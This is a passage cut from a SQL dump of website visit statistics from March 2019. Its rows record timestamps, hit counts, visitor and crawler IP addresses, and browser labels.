,1,0,0,'54.36.149.15','other'),(395626,1551859541,1,1,0,0,'46.229.168.139','other'),(395627,1551859841,1,1,0,0,'216.244.66.241','other'),(395628,1551860038,1,1,0,0,'95.134.51.6','chrome'),(395629,1551860066,1,1,0,0,'54.36.148.127','other'),(395630,1551860201,1,1,0,0,'54.36.150.43','other'),(395631,1551860324,2,2,0,0,'54.36.148.121','other'),(395632,1551860418,1,1,0,0,'94.100.221.234','chrome'),(395633,1551860452,1,1,0,0,'54.36.150.189','other'),(395634,1551860465,1,1,0,0,'91.196.177.46','chrome'),(395635,1551860625,1,1,0,0,'157.55.39.161','other'),(395636,1551860818,1,1,0,0,'54.36.148.120','other'),(395637,1551860825,1,1,0,0,'66.249.64.218','chrome'),(395638,1551860845,1,1,0,0,'54.36.150.70','other'),(395639,1551860863,1,1,0,0,'66.249.64.220','chrome'),(395640,1551861199,1,1,0,0,'54.36.150.104','other'),(395641,1551861458,1,1,0,0,'66.249.64.62','chrome'),(395642,1551861833,1,1,0,0,'46.211.112.170','chrome'),(395643,1551861877,1,1,0,0,'157.55.39.63','other'),(395644,1551862013,1,1,0,0,'193.34.93.69','chrome'),(395645,1551862179,1,1,0,0,'54.36.148.110','other'),(395646,1551862349,1,1,0,0,'54.36.150.167','other'),(395647,1551862521,1,1,0,0,'54.36.148.101','other'),(395648,1551863198,1,1,0,0,'66.249.64.218','chrome'),(395649,1551863231,1,1,0,0,'54.36.149.73','other'),(395650,1551863274,1,1,0,0,'66.249.64.222','chrome'),(395651,1551863319,1,1,0,0,'157.55.39.74','other'),(395652,1551863384,1,1,0,0,'46.229.168.136','other'),(395653,1551863879,1,1,0,0,'5.45.207.79','other'),(395654,1551863928,1,1,0,0,'54.36.148.59','other'),(395655,1551864013,3,3,0,0,'216.244.66.241','other'),(395656,1551864029,1,1,0,0,'46.229.168.154','other'),(395657,1551864191,1,1,0,0,'31.43.64.60','chrome'),(395658,1551864416,1,1,0,0,'95.132.44.161','firefox'),(395659,1551864438,1,1,0,0,'5.188.210.65','chrome'),(395660,1551864603,1,1,0,0,'91.196.179.134','chrome'),(395661,1551864910,1,1,0,0,'66.249.64.60','chrome'),(395662,1551865255,1,1,0,0,'178.95.198.184','chrome'),(395663,1551865284,1,1,0,0,'46.229.168.148','other'),(395664,1551865303,1,1,0,0,'66.249.64.218','chrome'),(395665,1551865332,1,1,0,0,'54.36.149.95','other'),(395666,1551865548,1,1,0,0,'54.36.150.98','other'),(395667,1551866084,1,1,0,0,'54.36.148.58','other'),(395668,1551866567,1,1,0,0,'54.36.150.47','other'),(395669,1551866616,1,1,0,0,'89.19.113.136','chrome'),(395670,1551866683,1,1,0,0,'46.182.86.51','firefox'),(395671,1551866800,2,2,0,0,'157.55.39.161','other'),(395672,1551867004,2,2,0,0,'95.213.141.126','opera'),(395673,1551867121,1,1,0,0,'91.196.178.89','chrome'),(395674,1551867379,1,1,0,0,'46.211.112.170','chrome'),(395675,1551868026,1,1,0,0,'8.29.198.27','other'),(395676,1551868108,1,1,0,0,'8.29.198.26','other'),(395677,1551868195,1,1,0,0,'157.55.39.74','other'),(395678,1551868213,1,1,0,0,'46.229.168.151','other'),(395679,1551868297,1,1,0,0,'46.229.168.154','other'),(395680,1551868998,1,1,0,0,'185.9.147.4','firefox'),(395681,1551869000,1,1,0,0,'54.36.148.60','other'),(395682,1551869103,1,1,0,0,'54.36.148.106','other'),(395683,1551869312,3,1,2,0,'66.249.64.218',''),(395684,1551869474,1,1,0,0,'66.249.64.62','chrome'),(395685,1551869820,1,1,0,0,'54.36.149.7','other'),(395686,1551869921,1,1,0,0,'54.36.150.42','other'),(395687,1551870222,1,1,0,0,'54.36.150.132','other'),(395688,1551870427,1,1,0,0,'54.36.148.50','other'),(395689,1551870509,1,1,0,0,'66.249.64.220','chrome'),(395690,1551870653,1,1,0,0,'157.55.39.74','other'),(395691,1551870846,1,1,0,0,'54.36.148.112','other'),(395692,1551871012,1,1,0,0,'91.196.178.99','chrome'),(395693,1551871302,1,1,0,0,'54.36.148.189','other'),(395694,1551871321,1,1,0,0,'54.36.150.12','other'),(395695,1551871410,1,1,0,0,'46.229.168.136','other'),(395696,1551871525,1,1,0,0,'46.229.168.152','other'),(395697,1551871542,1,1,0,0,'54.36.148.28','other'),(395698,1551871895,2,2,0,0,'66.249.64.58','chrome'),(395699,1551872229,1,1,0,0,'54.36.149.28','other'),(395700,1551872392,1,1,0,0,'157.55.39.74','other'),(395701,1551872957,1,1,0,0,'46.229.168.134','other'),(395702,1551873017,1,1,0,0,'54.36.150.3','other'),(395703,1551873057,1,1,0,0,'54.36.150.179','other'),(395704,1551873369,2,2,0,0,'66.249.64.218','chrome'),(395705,1551873509,1,1,0,0,'54.36.148.196','other'),(395706,1551873529,1,1,0,0,'54.36.148.77','other'),(395707,1551873699,1,1,0,0,'54.36.150.166','other'),(395708,1551873730,1,1,0,0,'54.36.148.116','other'),(395709,1551874163,1,1,0,0,'66.249.64.220','chrome'),(395710,1551874169,1,1,0,0,'54.36.149.56','other'),(395711,1551874369,1,1,0,0,'54.36.150.9','other'),(395712,1551874505,1,1,0,0,'178.93.102.83','chrome'),(395713,1551874785,1,1,0,0,'193.194.127.81','chrome'),(395714,1551874942,1,1,0,0,'216.244.66.241','other'),(395715,1551875110,1,1,0,0,'66.249.64.220','chrome'),(395716,1551875221,1,1,0,0,'46.229.168.145','other'),(395717,1551875381,2,2,0,0,'157.55.39.161','other'),(395718,1551875647,1,1,0,0,'46.211.26.49','chrome'),(395719,1551875694,1,1,0,0,'54.36.150.78','other'),(395720,1551875747,1,1,0,0,'54.36.148.97','other'),(395721,1551876031,1,1,0,0,'178.251.106.146','other'),(395722,1551876062,1,1,0,0,'54.36.148.27','other'),(395723,1551876352,3,3,0,0,'178.154.244.11','other'),(395724,1551876376,2,2,0,0,'157.55.39.161','other'),(395725,1551876422,2,2,0,0,'5.45.207.79','other'),(395726,1551876490,1,1,0,0,'40.77.167.193','other'),(395727,1551876524,1,1,0,0,'54.36.148.140','other'),(395728,1551876645,1,1,0,0,'46.211.26.49','chrome'),(395729,1551876722,1,1,0,0,'95.108.213.4','other'),(395730,1551876888,1,1,0,0,'54.36.150.51','other'),(395731,1551876894,1,1,0,0,'54.36.149.66','other'),(395732,1551877018,1,1,0,0,'216.244.66.241','other'),(395733,1551877212,2,2,0,0,'157.55.39.63','other'),(395734,1551877215,3,3,0,0,'141.8.142.103','other'),(395735,1551877292,1,1,0,0,'66.249.64.62','chrome'),(395736,1551877297,1,1,0,0,'46.229.168.154','other'),(395737,1551877379,1,1,0,0,'66.249.64.58','chrome'),(395738,1551877439,2,2,0,0,'5.45.207.19','other'),(395739,1551877466,1,1,0,0,'37.9.113.20','other'),(395740,1551877489,1,1,0,0,'54.36.150.75','other'),(395741,1551877522,1,1,0,0,'66.249.64.218','chrome'),(395742,1551877578,1,1,0,0,'37.9.113.148','other'),(395743,1551877592,1,1,0,0,'54.36.148.168','other'),(395744,1551877866,2,2,0,0,'95.108.213.4','other'),(395745,1551877900,3,3,0,0,'178.154.244.11','other'),(395746,1551877948,1,1,0,0,'37.55.111.30','chrome'),(395747,1551877980,1,1,0,0,'54.36.150.141','other'),(395748,1551878023,1,1,0,0,'54.36.148.20','other'),(395749,1551878035,1,1,0,0,'54.36.150.170','other'),(395750,1551878396,1,1,0,0,'5.45.207.79','other'),(395751,1551878640,1,1,0,0,'66.249.64.222','chrome'),(395752,1551878688,1,1,0,0,'54.36.149.77','other'),(395753,1551878758,1,1,0,0,'46.229.168.133','other'),(395754,1551878794,1,1,0,0,'66.249.64.60','chrome'),(395755,1551878851,1,1,0,0,'66.249.64.220','chrome'),(395756,1551878855,1,1,0,0,'141.8.142.103','other'),(395757,1551878895,1,1,0,0,'8.29.198.27','other'),(395758,1551878967,1,1,0,0,'8.29.198.26','other'),(395759,1551878971,2,2,0,0,'5.45.207.19','other'),(395760,1551879295,1,1,0,0,'157.55.39.63','other'),(395761,1551879394,3,3,0,0,'5.45.207.79','other'),(395762,1551879825,1,1,0,0,'66.249.64.220','chrome'),(395763,1551879886,1,1,0,0,'54.36.148.172','other'),(395764,1551880285,1,1,0,0,'178.154.244.11','other'),(395765,1551880433,1,1,0,0,'54.36.150.52','other'),(395766,1551880933,1,1,0,0,'54.36.150.108','other'),(395767,1551881064,1,1,0,0,'66.249.64.222','chrome'),(395768,1551881224,1,1,0,0,'66.249.64.220','chrome'),(395769,1551881373,1,1,0,0,'209.17.97.58','other'),(395770,1551881391,1,1,0,0,'157.55.39.185','other'),(395771,1551881466,1,1,0,0,'54.36.148.136','other'),(395772,1551882008,1,1,0,0,'216.244.66.241','other'),(395773,1551882422,1,1,0,0,'54.36.148.57','other'),(395774,1551882495,1,1,0,0,'37.55.130.100','chrome'),(395775,1551882544,1,1,0,0,'54.36.148.200','other'),(395776,1551882598,1,1,0,0,'66.249.64.220','chrome'),(395777,1551882664,1,1,0,0,'157.55.39.63','other'),(395778,1551882767,1,1,0,0,'54.36.149.105','other'),(395779,1551883342,1,1,0,0,'54.36.148.170','other'),(395780,1551883409,1,1,0,0,'54.36.148.6','other'),(395781,1551883427,1,1,0,0,'54.36.148.246','other'),(395782,1551884002,1,1,0,0,'91.225.141.15','chrome'),(395783,1551884345,1,1,0,0,'54.36.148.201','other'),(395784,1551884396,1,1,0,0,'46.242.32.245','firefox'),(395785,1551884425,1,1,0,0,'54.36.149.78','other'),(395786,1551884577,1,1,0,0,'54.36.150.137','other'),(395787,1551885071,1,1,0,0,'54.36.149.101','other'),(395788,1551885130,1,1,0,0,'157.55.39.166','other'),(395789,1551885256,1,1,0,0,'54.36.148.189','other'),(395790,1551885289,1,1,0,0,'95.132.9.87','chrome'),(395791,1551885382,1,1,0,0,'54.36.149.96','other'),(395792,1551885386,1,1,0,0,'54.36.148.228','other'),(395793,1551885500,1,1,0,0,'54.36.148.147','other'),(395794,1551885907,1,1,0,0,'54.36.150.60','other'),(395795,1551886323,1,1,0,0,'46.229.168.141','other'),(395796,1551886494,1,1,0,0,'54.36.149.3','other'),(395797,1551886957,1,1,0,0,'54.36.148.15','other'),(395798,1551887380,2,2,0,0,'216.244.66.241','other'),(395799,1551887694,1,1,0,0,'95.108.213.4','other'),(395800,1551887695,1,1,0,0,'178.154.244.11','other'),(395801,1551887874,1,1,0,0,'54.36.148.208','other'),(395802,1551888240,1,1,0,0,'54.36.148.4','other'),(395803,1551888570,1,1,0,0,'46.229.168.138','other'),(395804,1551888951,1,1,0,0,'54.36.150.73','other'),(395805,1551889007,1,1,0,0,'54.36.149.5','other'),(395806,1551889307,1,1,0,0,'54.36.150.79','other'),(395807,1551889541,1,1,0,0,'54.36.148.68','other'),(395808,1551889756,2,2,0,0,'8.29.198.26','other'),(395809,1551889801,1,1,0,0,'54.36.150.10','other'),(395810,1551890058,1,1,0,0,'216.244.66.241','other'),(395811,1551890166,1,1,0,0,'54.36.149.81','other'),(395812,1551890575,1,1,0,0,'66.249.64.222','chrome'),(395813,1551890617,1,1,0,0,'54.36.150.52','other'),(395814,1551890843,1,1,0,0,'54.36.148.118','other'),(395815,1551890924,1,1,0,0,'46.211.43.206','chrome'),(395816,1551890958,1,1,0,0,'176.9.9.94','other'),(395817,1551890979,1,1,0,0,'54.36.148.83','other'),(395818,1551891491,1,1,0,0,'220.100.67.35','firefox'),(395819,1551891493,1,1,0,0,'40.77.167.152','other'),(395820,1551891560,1,1,0,0,'46.211.119.223','chrome'),(395821,1551891921,1,1,0,0,'54.36.148.75','other'),(395822,1551892060,1,1,0,0,'54.36.148.249','other'),(395823,1551892073,1,1,0,0,'54.36.148.230','other'),(395824,1551892083,1,1,0,0,'216.244.66.241','other'),(395825,1551892444,1,1,0,0,'157.55.39.232','other'),(395826,1551892637,1,1,0,0,'54.36.148.51','other'),(395827,1551892999,1,1,0,0,'46.229.168.139','other'),(395828,1551893027,1,1,0,0,'54.36.148.164','other'),(395829,1551893155,1,1,0,0,'157.55.39.73','other'),(395830,1551893335,1,1,0,0,'216.244.66.241','other'),(395831,1551893601,1,1,0,0,'54.36.150.127','other'),(395832,1551893613,1,1,0,0,'54.36.148.78','other'),(395833,1551893741,1,1,0,0,'54.36.148.204','other'),(395834,1551893931,1,1,0,0,'46.229.168.154','other'),(395835,1551894794,1,1,0,0,'40.77.167.161','other'),(395836,1551894855,1,1,0,0,'54.36.148.9','other'),(395837,1551894915,1,1,0,0,'54.36.150.61','other'),(395838,1551895541,1,1,0,0,'180.76.15.139','other'),(395839,1551895547,1,1,0,0,'37.9.113.148','other'),(395840,1551895569,3,3,0,0,'178.154.244.11','other'),(395841,1551895689,1,1,0,0,'54.36.148.76','other'),(395842,1551895743,1,1,0,0,'54.36.148.113','other'),(395843,1551896133,2,2,0,0,'5.45.207.79','other'),(395844,1551896252,2,2,0,0,'141.8.142.103','other'),(395845,1551896565,3,3,0,0,'40.77.167.44','other'),(395846,1551896570,7,7,0,0,'40.77.167.173','other'),(395847,1551896579,4,4,0,0,'157.55.39.71','other'),(395848,1551896610,5,5,0,0,'157.55.39.73','other'),(395849,1551896640,1,1,0,0,'54.36.150.159','other'),(395850,1551896963,1,1,0,0,'5.45.207.19','other'),(395851,1551897127,1,1,0,0,'54.36.148.85','other'),(395852,1551897255,1,1,0,0,'54.36.148.232','other'),(395853,1551897749,1,1,0,0,'54.36.148.50','other'),(395854,1551897889,1,1,0,0,'216.244.66.241','other'),(395855,1551897950,1,1,0,0,'54.36.150.75','other'),(395856,1551898245,1,1,0,0,'66.249.64.220','chrome'),(395857,1551898309,1,1,0,0,'54.36.148.245','other'),(395858,1551899304,1,1,0,0,'54.36.148.108','other'),(395859,1551899444,1,1,0,0,'54.36.150.44','other'),(395860,1551899521,1,1,0,0,'104.248.235.238','firefox'),(395861,1551899523,1,1,0,0,'54.36.148.194','other'),(395862,1551900071,2,2,0,0,'54.36.148.36','other'),(395863,1551900554,1,1,0,0,'54.36.148.198','other'),(395864,1551900573,1,1,0,0,'54.36.150.21','other'),(395865,1551900623,1,1,0,0,'8.29.198.25','other'),(395866,1551900686,1,1,0,0,'8.29.198.27','other'),(395867,1551900698,1,1,0,0,'178.154.244.11','other'),(395868,1551900808,1,1,0,0,'37.9.113.103','other'),(395869,1551901067,1,1,0,0,'216.244.66.241','other'),(395870,1551901175,1,1,0,0,'54.36.150.74','other'),(395871,1551901203,1,1,0,0,'54.36.148.28','other'),(395872,1551901812,1,1,0,0,'54.36.150.9','other'),(395873,1551901872,1,1,0,0,'54.36.149.80','other'),(395874,1551902028,1,1,0,0,'54.36.150.190','other'),(395875,1551902188,1,1,0,0,'66.249.64.193','chrome'),(395876,1551902205,1,1,0,0,'207.46.13.105','other'),(395877,1551902213,1,1,0,0,'91.196.178.169','chrome'),(395878,1551902348,1,1,0,0,'54.36.148.164','other'),(395879,1551902449,1,1,0,0,'66.249.64.60','chrome'),(395880,1551902500,1,1,0,0,'13.57.233.99','chrome'),(395881,1551902599,1,1,0,0,'54.36.148.223','other'),(395882,1551902647,1,1,0,0,'46.229.168.151','other'),(395883,1551902654,1,1,0,0,'54.36.150.113','other'),(395884,1551902797,1,1,0,0,'54.36.150.99','other'),(395885,1551903598,1,1,0,0,'54.36.149.57','other'),(395886,1551903851,2,2,0,0,'66.249.64.60','chrome'),(395887,1551903926,2,2,0,0,'66.249.64.222','chrome'),(395888,1551904017,2,2,0,0,'66.249.64.220','chrome'),(395889,1551904147,1,1,0,0,'54.36.148.103','other'),(395890,1551904189,1,1,0,0,'66.249.64.62','chrome'),(395891,1551904278,1,1,0,0,'66.249.64.58','chrome'),(395892,1551904602,1,1,0,0,'207.46.13.211','other'),(395893,1551904884,1,1,0,0,'87.250.224.47','other'),(395894,1551904890,1,1,0,0,'54.36.148.35','other'),(395895,1551905010,1,1,0,0,'46.229.168.148','other'),(395896,1551905185,1,1,0,0,'54.36.148.168','other'),(395897,1551905275,1,1,0,0,'54.36.150.118','other'),(395898,1551905359,2,2,0,0,'216.244.66.241','other'),(395899,1551905505,1,1,0,0,'54.36.150.4','other'),(395900,1551905539,1,1,0,0,'95.108.181.75','other'),(395901,1551905657,1,1,0,0,'54.36.148.132','other'),(395902,1551905834,1,1,0,0,'54.36.148.237','other'),(395903,1551905884,1,1,0,0,'54.36.148.101','other'),(395904,1551906025,1,1,0,0,'54.36.148.158','other'),(395905,1551906028,1,1,0,0,'66.249.64.220','chrome'),(395906,1551906134,1,1,0,0,'209.17.97.58','other'),(395907,1551906163,1,1,0,0,'157.55.39.71','other'),(395908,1551906512,1,1,0,0,'180.76.15.16','other'),(395909,1551906624,1,1,0,0,'54.36.148.52','other'),(395910,1551906720,1,1,0,0,'54.36.149.85','other'),(395911,1551906786,1,1,0,0,'54.36.150.159','other'),(395912,1551907157,1,1,0,0,'54.36.150.112','other'),(395913,1551907579,1,1,0,0,'54.36.150.54','other'),(395914,1551907833,1,1,0,0,'207.46.13.211','other'),(395915,1551907897,1,1,0,0,'66.249.64.62','chrome'),(395916,1551908059,1,1,0,0,'54.36.148.22','other'),(395917,1551908282,3,3,0,0,'216.244.66.241','other'),(395918,1551908513,1,1,0,0,'180.76.15.146','other'),(395919,1551908889,1,1,0,0,'207.46.13.211','other'),(395920,1551909569,1,1,0,0,'188.163.124.237','chrome'),(395921,1551909776,1,1,0,0,'157.55.39.205','other'),(395922,1551910058,1,1,0,0,'54.36.150.137','other'),(395923,1551910067,1,1,0,0,'46.229.168.152','other'),(395924,1551910475,1,1,0,0,'54.36.148.57','other'),(395925,1551910826,1,1,0,0,'54.36.150.133','other'),(395926,1551910883,1,1,0,0,'216.244.66.241','other'),(395927,1551911379,1,1,0,0,'54.36.148.120','other'),(395928,1551911486,1,1,0,0,'8.29.198.26','other'),(395929,1551911504,1,1,0,0,'54.36.150.149','other'),(395930,1551911538,1,1,0,0,'8.29.198.27','other'),(395931,1551911915,1,1,0,0,'54.36.148.108','other'),(395932,1551911995,1,1,0,0,'54.36.150.86','other'),(395933,1551912079,1,1,0,0,'54.36.149.39','other'),(395934,1551912182,1,1,0,0,'188.163.124.237','chrome'),(395935,1551912509,1,1,0,0,'54.36.149.80','other'),(395936,1551913301,1,1,0,0,'54.36.148.153','other'),(395937,1551913474,4,4,0,0,'216.244.66.241','other'),(395938,1551913607,1,1,0,0,'54.36.149.30','other'),(395939,1551914185,1,1,0,0,'54.36.150.11','other'),(395940,1551914258,1,1,0,0,'54.36.148.240','other'),(395941,1551914950,2,2,0,0,'5.45.207.79','other'),(395942,1551914983,1,1,0,0,'54.36.149.56','other'),(395943,1551914989,1,1,0,0,'54.36.148.40','other'),(395944,1551915200,4,4,0,0,'141.8.142.103','other'),(395945,1551915284,1,1,0,0,'37.9.113.148','other'),(395946,1551915312,1,1,0,0,'37.9.113.20','other'),(395947,1551915317,1,1,0,0,'37.9.113.103','other'),(395948,1551915401,1,1,0,0,'54.36.150.169','other'),(395949,1551915604,1,1,0,0,'54.36.148.130','other'),(395950,1551915618,2,2,0,0,'95.108.213.4','other'),(395951,1551915729,6,6,0,0,'178.154.244.11','other'),(395952,1551915850,1,1,0,0,'54.36.150.142','other'),(395953,1551915941,1,1,0,0,'157.55.39.205','other'),(395954,1551916194,1,1,0,0,'5.45.207.19','other'),(395955,1551916260,1,1,0,0,'178.154.200.48','other'),(395956,1551916448,1,1,0,0,'95.108.181.54','other'),(395957,1551916534,1,1,0,0,'216.244.66.241','other'),(395958,1551917056,1,1,0,0,'213.180.203.9','other'),(395959,1551917166,1,1,0,0,'37.9.113.103','other'),(395960,1551917336,2,2,0,0,'5.45.207.79','other'),(395961,1551917406,1,1,0,0,'54.36.148.12','other'),(395962,1551917535,1,1,0,0,'178.154.244.11','other'),(395963,1551917568,1,1,0,0,'40.77.167.118','other'),(395964,1551917689,1,1,0,0,'54.36.148.125','other'),(395965,1551917702,3,3,0,0,'141.8.142.103','other'),(395966,1551917754,1,1,0,0,'178.154.171.69','other'),(395967,1551917805,1,1,0,0,'5.45.207.19','other'),(395968,1551918135,1,1,0,0,'54.36.148.156','other'),(395969,1551918427,1,1,0,0,'54.36.150.33','other'),(395970,1551918675,1,1,0,0,'95.163.255.49','other'),(395971,1551918700,3,3,0,0,'216.244.66.241','other'),(395972,1551918701,1,1,0,0,'54.36.148.130','other'),(395973,1551919849,1,1,0,0,'54.36.150.122','other'),(395974,1551920154,1,1,0,0,'167.86.75.137','other'),(395975,1551920375,1,1,0,0,'54.36.150.119','other'),(395976,1551920485,1,1,0,0,'46.229.168.145','other'),(395977,1551920579,124,124,0,0,'78.46.61.245','other'),(395978,1551920726,1,1,0,0,'46.229.168.130','other'),(395979,1551920991,113,113,0,0,'5.9.144.234','other'),(395980,1551921029,1,1,0,0,'40.77.167.63','other'),(395981,1551921116,162,162,0,0,'5.9.154.69','other'),(395982,1551921680,1,1,0,0,'216.244.66.241','other'),(395983,1551922338,2,2,0,0,'8.29.198.26','other'),(395984,1551922909,1,1,0,0,'216.244.66.241','other'),(395985,1551922916,1,1,0,0,'54.36.150.108','other'),(395986,1551923024,1,1,0,0,'54.36.148.31','other'),(395987,1551923069,1,1,0,0,'5.45.207.79','other'),(395988,1551923193,81,81,0,0,'78.46.61.245','other'),(395989,1551923451,1,1,0,0,'141.8.142.38','other'),(395990,1551923546,1,1,0,0,'66.249.64.222','chrome'),(395991,1551923706,1,1,0,0,'54.36.149.11','other'),(395992,1551923723,1,1,0,0,'54.36.148.195','other'),(395993,1551923791,1,1,0,0,'95.163.255.47','other'),(395994,1551923946,1,1,0,0,'54.36.148.39','other'),(395995,1551924066,1,1,0,0,'66.249.64.220','chrome'),(395996,1551924094,1,1,0,0,'54.36.148.80','other'),(395997,1551924178,1,1,0,0,'54.36.150.26','other'),(395998,1551924487,2,2,0,0,'35.163.180.225','chrome'),(395999,1551924535,1,1,0,0,'54.36.148.201','other'),(396000,1551924602,1,1,0,0,'207.46.13.150','other'),(396001,1551924747,1,1,0,0,'66.249.64.218','chrome'),(396002,1551925008,1,1,0,0,'54.36.150.72','other'),(396003,1551926077,2,2,0,0,'216.244.66.241','other'),(396004,1551926486,1,1,0,0,'46.229.168.141','other'),(396005,1551926568,1,1,0,0,'157.55.39.136','other'),(396006,1551926611,1,1,0,0,'54.36.149.87','other'),(396007,1551926919,1,1,0,0,'54.36.150.47','other'),(396008,1551927867,1,1,0,0,'54.36.150.147','other'),(396009,1551927947,1,1,0,0,'54.36.148.133','other'),(396010,1551928013,1,1,0,0,'54.36.149.79','other'),(396011,1551928084,1,1,0,0,'54.36.148.251','other'),(396012,1551928090,1,1,0,0,'54.36.148.136','other'),(396013,1551928161,1,1,0,0,'157.55.39.136','other'),(396014,1551928415,2,2,0,0,'216.244.66.241','other'),(396015,1551928485,1,1,0,0,'54.36.148.51','other'),(396016,1551928543,1,1,0,0,'54.36.149.36','other'),(396017,1551928576,1,1,0,0,'54.36.149.73','other'),(396018,1551928602,1,1,0,0,'54.36.148.170','other'),(396019,1551928959,1,1,0,0,'180.76.15.19','other'),(396020,1551929393,1,1,0,0,'54.36.149.58','other'),(396021,1551929567,1,1,0,0,'54.36.150.118','other'),(396022,1551930004,1,1,0,0,'40.77.167.63','other'),(396023,1551930254,1,1,0,0,'54.36.148.161','other'),(396024,1551930635,1,1,0,0,'54.36.149.25','other'),(396025,1551930905,1,1,0,0,'54.36.148.216','other'),(396026,1551930957,1,1,0,0,'66.249.64.218','chrome'),(396027,1551931097,1,1,0,0,'54.36.148.194','other'),(396028,1551931325,1,1,0,0,'54.36.149.32','other'),(396029,1551931486,1,1,0,0,'54.36.148.104','other'),(396030,1551931573,1,1,0,0,'54.36.148.19','other'),(396031,1551931751,1,1,0,0,'207.46.13.147','other'),(396032,1551932275,1,1,0,0,'157.55.39.227','other'),(396033,1551932897,1,1,0,0,'54.36.148.111','other'),(396034,1551933058,1,1,0,0,'54.36.149.42','other'),(396035,1551933215,2,2,0,0,'8.29.198.27','other'),(396036,1551933253,1,1,0,0,'54.36.150.90','other'),(396037,1551933304,1,1,0,0,'40.77.167.63','other'),(396038,1551933335,1,1,0,0,'141.8.142.103','other'),(396039,1551933344,3,3,0,0,'5.45.207.79','other'),(396040,1551933493,3,3,0,0,'5.45.207.19','other'),(396041,1551933526,1,1,0,0,'54.36.150.62','other'),(396042,1551933665,1,1,0,0,'157.55.39.136','other'),(396043,1551933701,1,1,0,0,'213.180.203.40','other'),(396044,1551933711,1,1,0,0,'213.180.203.17','other'),(396045,1551933827,1,1,0,0,'66.249.64.220','chrome'),(396046,1551933871,1,1,0,0,'54.36.150.20','other'),(396047,1551933943,1,1,0,0,'54.36.148.183','other'),(396048,1551933992,1,1,0,0,'95.108.181.54','other'),(396049,1551933998,1,1,0,0,'54.36.148.163','other'),(396050,1551934136,3,3,0,0,'178.154.244.11','other'),(396051,1551934295,1,1,0,0,'54.36.150.83','other'),(396052,1551934315,1,1,0,0,'216.244.66.241','other'),(396053,1551934352,2,2,0,0,'5.45.207.79','other'),(396054,1551934464,2,2,0,0,'95.108.213.4','other'),(396055,1551934465,1,1,0,0,'54.36.149.69','other'),(396056,1551934514,4,4,0,0,'5.45.207.19','other'),(396057,1551934678,1,1,0,0,'54.36.148.46','other'),(396058,1551934856,1,1,0,0,'54.36.148.6','other'),(396059,1551935023,1,1,0,0,'54.36.148.113','other'),(396060,1551935087,4,4,0,0,'66.249.64.218','chrome'),(396061,1551935151,3,3,0,0,'66.249.64.220','chrome'),(396062,1551935172,1,1,0,0,'213.180.203.40','other'),(396063,1551935202,5,5,0,0,'66.249.64.222','chrome'),(396064,1551935213,1,1,0,0,'37.9.113.148','other'),(396065,1551935269,1,1,0,0,'141.8.142.103','other'),(396066,1551935321,2,2,0,0,'5.45.207.79','other'),(396067,1551935336,1,1,0,0,'157.55.39.227','other'),(396068,1551935368,1,1,0,0,'207.46.13.172','other'),(396069,1551935390,1,1,0,0,'95.108.181.75','other'),(396070,1551935578,2,2,0,0,'66.249.64.58','chrome'),(396071,1551935603,1,1,0,0,'46.211.0.138','chrome'),(396072,1551935726,1,1,0,0,'46.229.168.153','other'),(396073,1551935736,1,1,0,0,'95.163.255.49','other'),(396074,1551935788,1,1,0,0,'54.36.148.74','other'),(396075,1551935811,1,1,0,0,'95.108.213.4','other'),(396076,1551935815,1,1,0,0,'95.163.255.47','other'),(396077,1551935863,4,4,0,0,'178.154.244.11','other'),(396078,1551935879,1,1,0,0,'89.163.242.241','opera'),(396079,1551935949,1,1,0,0,'54.36.150.55','other'),(396080,1551936043,1,1,0,0,'66.249.64.60','chrome'),(396081,1551936327,2,2,0,0,'5.45.207.19','other'),(396082,1551936400,1,1,0,0,'54.36.150.16','other'),(396083,1551936539,1,1,0,0,'141.8.142.103','other'),(396084,1551936818,1,1,0,0,'40.77.167.63','other'),(396085,1551936880,1,1,0,0,'54.36.150.147','other'),(396086,1551936955,1,1,0,0,'95.163.255.45','other'),(396087,1551937008,1,1,0,0,'91.196.178.133','firefox'),(396088,1551937135,1,1,0,0,'157.55.39.227','other'),(396089,1551937172,2,2,0,0,'216.244.66.241','other'),(396090,1551937176,1,1,0,0,'207.46.13.172','other'),(396091,1551937405,1,1,0,0,'52.53.201.78','chrome'),(396092,1551937548,1,1,0,0,'54.36.149.78','other'),(396093,1551937856,1,1,0,0,'46.229.168.143','other'),(396094,1551937918,1,1,0,0,'54.36.148.81','other'),(396095,1551937952,1,1,0,0,'66.249.64.218','chrome'),(396096,1551937997,1,1,0,0,'54.36.148.244','other'),(396097,1551938328,2,2,0,0,'66.249.64.220','chrome'),(396098,1551938339,1,1,0,0,'66.249.64.60','chrome'),(396099,1551938826,3,3,0,0,'216.244.66.241','other'),(396100,1551938852,1,1,0,0,'54.36.148.227','other'),(396101,1551938871,1,1,0,0,'54.36.148.201','other'),(396102,1551938872,1,1,0,0,'54.36.150.130','other'),(396103,1551939027,1,1,0,0,'54.36.149.75','other'),(396104,1551939727,1,1,0,0,'54.36.148.198','other'),(396105,1551939762,1,1,0,0,'54.36.150.146','other'),(396106,1551939843,1,1,0,0,'5.45.207.79','other'),(396107,1551939927,1,1,0,0,'5.45.207.19','other'),(396108,1551940043,1,1,0,0,'37.187.129.166','other'),(396109,1551940297,1,1,0,0,'54.36.148.19','other'),(396110,1551940557,1,1,0,0,'54.36.150.140','other'),(396111,1551940679,2,2,0,0,'66.249.64.218','chrome'),(396112,1551940772,1,1,0,0,'54.36.148.141','other'),(396113,1551940794,1,1,0,0,'54.36.148.30','other'),(396114,1551940861,1,1,0,0,'66.249.64.222','chrome'),(396115,1551940989,1,1,0,0,'54.36.149.13','other'),(396116,1551941253,1,1,0,0,'216.244.66.241','other'),(396117,1551941531,1,1,0,0,'91.196.177.46','firefox'),(396118,1551941553,1,1,0,0,'157.55.39.227','other'),(396119,1551942212,1,1,0,0,'54.36.148.50','other'),(396120,1551942519,1,1,0,0,'54.36.148.60','other'),(396121,1551942574,1,1,0,0,'54.36.150.113','other'),(396122,1551942787,1,1,0,0,'54.36.148.51','other'),(396123,1551942968,1,1,0,0,'54.36.148.231','other'),(396124,1551943359,1,1,0,0,'54.36.150.146','other'),(396125,1551943631,1,1,0,0,'54.36.150.187','other'),(396126,1551943838,1,1,0,0,'66.249.64.222','chrome'),(396127,1551943892,1,1,0,0,'213.180.203.9','other'),(396128,1551943918,1,1,0,0,'66.249.64.218','chrome'),(396129,1551943933,1,1,0,0,'54.36.148.54','other'),(396130,1551944092,1,1,0,0,'8.29.198.26','other'),(396131,1551944156,1,1,0,0,'8.29.198.25','other'),(396132,1551944185,1,1,0,0,'213.180.203.40','other'),(396133,1551944348,1,1,0,0,'54.36.148.135','other'),(396134,1551944668,1,1,0,0,'91.196.178.133','chrome'),(396135,1551944733,1,1,0,0,'216.244.66.241','other'),(396136,1551944842,1